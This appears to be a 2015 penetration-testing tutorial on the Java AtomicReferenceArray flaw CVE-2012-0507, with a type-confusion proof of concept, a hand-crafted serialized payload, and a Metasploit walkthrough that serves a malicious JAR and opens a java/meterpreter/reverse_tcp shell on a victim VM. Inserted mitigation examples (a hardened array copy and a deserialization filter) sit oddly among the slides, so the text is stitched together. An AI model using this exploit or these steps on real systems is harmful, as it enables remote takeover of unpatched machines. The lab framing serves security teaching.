Exploiting Java vulnerability [CVE-2012-0507]

Posted on 27-May-2015


Description

CVE-2012-0507 is a vulnerability in the JRE caused by the AtomicReferenceArray class implementation not properly checking that its backing array is of the expected Object[] type. A malicious Java application or applet could use this flaw to crash the Java Virtual Machine (JVM) or bypass Java sandbox restrictions.


EXPLOITING JAVA VULNERABILITY (CVE-2012-0507) USING METASPLOIT

PenTesting Tutorials: www.BreakTheSecurity.com

Introduction to the Java AtomicReferenceArray vulnerability

About CVE-2012-0507

A vulnerability in the JRE caused by the AtomicReferenceArray class implementation not properly checking that its backing array is of the expected Object[] type. The vulnerability was found by Jeroen Frijters.

A malicious Java application or applet could use this flaw to crash the Java Virtual Machine (JVM) or bypass Java sandbox restrictions.

Problematic code

public AtomicReferenceArray(E[] array) {
    // clone() keeps the runtime component type of the caller's array,
    // so the backing store may be a subtype array rather than an Object[]
    this.array = array.clone();
}

Violating the Type Safety

import java.util.concurrent.atomic.*;

class first {}

public class violateClass {
    public static void main(String a[]) {
        Object obj = new first();
        // backing store is a first[] because the constructor only clone()s it
        AtomicReferenceArray r = new AtomicReferenceArray(new first[1]);
        obj = "Hell";
        r.set(0, obj);                 // unchecked write: a String lands in a first[]
        first f = (first) r.get(0);
    }
}
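To see why the constructor above matters, the following is an added example (not from the slides and not the JDK's own source) that contrasts the unpatched copy, clone(), with the shape of the fix: copying into a genuine Object[] and refusing any backing array whose runtime class is not Object[] when the object is deserialized. The class and method names (TypedRefArrayDemo, vulnerableCopy, hardenedCopy, validateBackingArray) are hypothetical; Union1 and Union2 mirror the names used on this page.

```java
import java.io.InvalidObjectException;
import java.util.Arrays;

// Added example: a cut-down look-alike of the AtomicReferenceArray internals,
// not the JDK implementation. Names are illustrative.
public class TypedRefArrayDemo {
    static class Union1 {}
    static class Union2 {}

    // Vulnerable shape: clone() keeps the caller's runtime component type, so the
    // store can be a Union1[] even though the declaring field is typed Object[].
    static Object[] vulnerableCopy(Object[] array) {
        return array.clone();
    }

    // Hardened shape: always copy into a real Object[], whatever the input's
    // runtime type (the approach the patched JDK constructor takes).
    static Object[] hardenedCopy(Object[] array) {
        return Arrays.copyOf(array, array.length, Object[].class);
    }

    // Hardened deserialization: a readObject hook must reject any backing array
    // whose runtime class is not exactly Object[], which is what a hand-crafted
    // stream tries to smuggle in.
    static void validateBackingArray(Object a) throws InvalidObjectException {
        if (a == null || a.getClass() != Object[].class) {
            throw new InvalidObjectException("Not Object[] type: "
                    + (a == null ? "null" : a.getClass().getName()));
        }
    }

    public static void main(String[] args) {
        Union1[] src = new Union1[1];

        Object[] viaClone = vulnerableCopy(src);
        System.out.println("clone() runtime type  : " + viaClone.getClass().getName());
        try {
            // A normal bytecode store is checked by the JVM against the array's runtime type.
            viaClone[0] = new Union2();
        } catch (ArrayStoreException e) {
            System.out.println("checked store rejected: " + e);
        }
        // The unpatched set() wrote through Unsafe, which skips that check; that is
        // why a Union1[] hidden behind an Object[] field becomes a type-confusion primitive.

        Object[] viaCopyOf = hardenedCopy(src);
        System.out.println("copyOf() runtime type : " + viaCopyOf.getClass().getName());
        viaCopyOf[0] = new Union2(); // legal: the store really is an Object[]

        try {
            validateBackingArray(viaCopyOf); // accepted
            validateBackingArray(viaClone);  // rejected: runtime class is Union1[]
        } catch (InvalidObjectException e) {
            System.out.println("deserialization guard : " + e.getMessage());
        }
    }
}
```

Compile and run it as a single file (javac TypedRefArrayDemo.java && java TypedRefArrayDemo). The ArrayStoreException on the cloned array is the JVM's own guard firing on a checked store; the vulnerability was that AtomicReferenceArray.set() bypassed that guard, so the only robust fix is to guarantee the backing array is an Object[] at both entry points.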

Exploiting

By manually constructing a serialized object graph you can stick any array you want into an AtomicReferenceArray instance and then use the AtomicReferenceArray.set() method to write an arbitrary reference to violate type safety.

import java.io.*;
import java.util.concurrent.atomic.*;

class Union1 { }
class Union2 { }

public class test {
    // Hand-built serialized graph: an Object[] holding a Union1[] and an
    // AtomicReferenceArray whose "array" field refers back to that Union1[]
    static byte[] buf = new byte[] {
        -84, -19, 0, 5, 117, 114, 0, 19, 91, 76, 106, 97, 118, 97, 46, 108, 97, 110, 103,
        46, 79, 98, 106, 101, 99, 116, 59, -112, -50, 88, -97, 16, 115, 41, 108, 2, 0,
        0, 120, 112, 0, 0, 0, 2, 117, 114, 0, 9, 91, 76, 85, 110, 105, 111, 110, 49, 59,
        -2, 44, -108, 17, -120, -74, -27, -1, 2, 0, 0, 120, 112, 0, 0, 0, 1, 112, 115,
        114, 0, 48, 106, 97, 118, 97, 46, 117, 116, 105, 108, 46, 99, 111, 110, 99, 117,
        114, 114, 101, 110, 116, 46, 97, 116, 111, 109, 105, 99, 46, 65, 116, 111, 109,
        105, 99, 82, 101, 102, 101, 114, 101, 110, 99, 101, 65, 114, 114, 97, 121, -87,
        -46, -34, -95, -66, 101, 96, 12, 2, 0, 1, 91, 0, 5, 97, 114, 114, 97, 121, 116,
        0, 19, 91, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 79, 98, 106, 101,
        99, 116, 59, 120, 112, 113, 0, 126, 0, 3
    };

    public static void main(String[] args) throws Throwable {
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(buf));
        Object[] arr = (Object[]) ois.readObject();
        Union1[] u1 = (Union1[]) arr[0];
        AtomicReferenceArray ara = (AtomicReferenceArray) arr[1];
        ara.set(0, new Union2());
        System.out.println(u1[0]);
    }
}
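From the defending side, the interesting property of the stream above is that it can be triaged and blocked before anything is instantiated. The following added example (not from the slides) does two things with the same byte array: it lists the class names carried in the stream's class descriptors without deserializing it, and it reads the stream through a deserialization filter that rejects AtomicReferenceArray and allows only the classes the application expects. The filter API (java.io.ObjectInputFilter) assumes Java 9 or later; the class and method names (SerialTriage, classNames, readFiltered) are hypothetical, and Union1 is declared locally because the stream refers to it.

```java
import java.io.ByteArrayInputStream;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.List;

// Declared so the stream's "[LUnion1;" descriptor resolves, as on the page.
class Union1 { }

// Added example; not code from the slides. Assumes Java 9+ for ObjectInputFilter.
public class SerialTriage {
    // The serialized graph from this page, reproduced so the checks run against it.
    static final byte[] PAYLOAD = {
        -84, -19, 0, 5, 117, 114, 0, 19, 91, 76, 106, 97, 118, 97, 46, 108, 97, 110, 103,
        46, 79, 98, 106, 101, 99, 116, 59, -112, -50, 88, -97, 16, 115, 41, 108, 2, 0,
        0, 120, 112, 0, 0, 0, 2, 117, 114, 0, 9, 91, 76, 85, 110, 105, 111, 110, 49, 59,
        -2, 44, -108, 17, -120, -74, -27, -1, 2, 0, 0, 120, 112, 0, 0, 0, 1, 112, 115,
        114, 0, 48, 106, 97, 118, 97, 46, 117, 116, 105, 108, 46, 99, 111, 110, 99, 117,
        114, 114, 101, 110, 116, 46, 97, 116, 111, 109, 105, 99, 46, 65, 116, 111, 109,
        105, 99, 82, 101, 102, 101, 114, 101, 110, 99, 101, 65, 114, 114, 97, 121, -87,
        -46, -34, -95, -66, 101, 96, 12, 2, 0, 1, 91, 0, 5, 97, 114, 114, 97, 121, 116,
        0, 19, 91, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 79, 98, 106, 101,
        99, 116, 59, 120, 112, 113, 0, 126, 0, 3
    };

    // Tag byte for a class descriptor in the Java Object Serialization stream format.
    static final int TC_CLASSDESC = 0x72;

    // Triage without deserializing: pull the class name out of every TC_CLASSDESC
    // record. Heuristic scan: a 0x72 tag, a 2-byte UTF length, then a name that
    // looks like a (possibly array) class name. Stray 0x72 bytes inside strings
    // are dropped because their "length" does not fit in the remaining bytes.
    static List<String> classNames(byte[] stream) {
        List<String> names = new ArrayList<>();
        if (stream.length < 4 || (stream[0] & 0xff) != 0xac || (stream[1] & 0xff) != 0xed) {
            return names; // not a Java serialization stream (magic is 0xACED)
        }
        for (int i = 4; i + 3 < stream.length; i++) {
            if ((stream[i] & 0xff) != TC_CLASSDESC) continue;
            int len = ((stream[i + 1] & 0xff) << 8) | (stream[i + 2] & 0xff);
            if (len == 0 || i + 3 + len > stream.length) continue;
            String name = new String(stream, i + 3, len, StandardCharsets.UTF_8);
            boolean plausible = name.chars().allMatch(
                    c -> Character.isJavaIdentifierPart(c) || c == '.' || c == '[' || c == ';');
            if (plausible) names.add(name);
        }
        return names;
    }

    // Mitigation: an allow-list filter. AtomicReferenceArray is rejected by name,
    // Union1 and java.lang classes are permitted, everything else is rejected.
    // The filter runs before each class is instantiated, so the crafted
    // AtomicReferenceArray never gets built.
    static Object readFiltered(byte[] stream) throws Exception {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(stream))) {
            ois.setObjectInputFilter(ObjectInputFilter.Config.createFilter(
                    "!java.util.concurrent.atomic.AtomicReferenceArray;Union1;java.lang.*;!*"));
            return ois.readObject();
        }
    }

    public static void main(String[] args) throws Exception {
        System.out.println("classes referenced: " + classNames(PAYLOAD));
        try {
            readFiltered(PAYLOAD);
            System.out.println("stream accepted");
        } catch (InvalidClassException e) {
            System.out.println("stream rejected: " + e.getMessage());
        }
    }
}
```

The scanner is deliberately a heuristic for triage (it does not follow back-references or block data), but for a suspicious blob it answers the first question an analyst has, which classes a stream would try to instantiate, without running any of their deserialization code. The filter is the mitigation that belongs in production code that reads untrusted streams; the same pattern string can also be set process-wide with the jdk.serialFilter system property.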

Exploiting this vulnerability using Metasploit

Requirements:

○ VirtualBox
○ Target OS (Windows, ...)
○ PenTesting Distro (Backtrack)
○ JRE 6 (unpatched version)

Preparing Target Machine

Start the "Target" Machine.

Install the JRE 6. (I have already installed the JRE.)

Preparing Attacker Machine

Now, start the BT5. Open the Terminal and type "msfupdate".

This will update the Metasploit Framework (MSF) with the latest exploits.

Open the Terminal and type msfconsole. Now type:

use exploit/multi/browser/java_atomicreferencearray

The above command will use the java_atomicreferencearray.rb module for the attack.

Now type "show options" to display the settings available and/or required for this specific module.

set SRVPORT 80
set URIPATH /
set SRVHOST [Backtrack_ip]

How to get IP of Backtrack:

○ Open the Terminal
○ Type ifconfig
○ It will display the IP

Payload

Type "show payloads". This will display the list of payloads available to use.

I am going to use the reverse_tcp payload. This payload will get a reverse TCP connection from the Target to our machine.

Type set payload java/meterpreter/reverse_tcp

In order to get the reverse connection, we have to set the Backtrack IP in LHOST.

So type the following command: set LHOST [Backtrack_IP]

EXPLOIT

Are you ready?! Let us

We have set up everything needed for the exploit. So it is time to break into the Target machine.

Type "exploit" in the msfconsole.

This will start the reverse handler on our machine, and it will wait for anyone who connects to our HTTP server (e.g. http://192.168.56.102).

Once the victim connects to our server, it will send a JAR that exploits the CVE-2012-0507 vulnerability.

Victim side

We have set up our exploit. Let us see what happens when our victim opens our URL.

Go to the "Target" VM. Open Firefox and enter the URL you got from the Metasploit exploit, e.g. http://192.168.56.102

No need to add ':80' to the URL, because 80 is the default HTTP port.

It loads nothing, but in the background Backtrack sends a JAR file that exploits the vulnerability. After a successful exploit, control is handed to Backtrack.

Now type "sessions" in the Metasploit console; this will display the list of active sessions (the victims list).

Type "sessions -i 1"; this will open the connection to the session with id '1' and bring you to Meterpreter.

Meterpreter will help you interact with and control the Target.

Exploited in the Wild

In April 2012, research conducted by Dr.Web determined that more than 600,000 Mac computers were infected with the BackDoor.Flashback botnet.

The vulnerability was also included in exploit kits.

I hope this article has given you a good insight into how to use the Metasploit Framework to exploit the Java vulnerability.

I hope this will help you to get into the PenTesting world..!

For more PenTesting Tutorials: www.BreakTheSecurity.com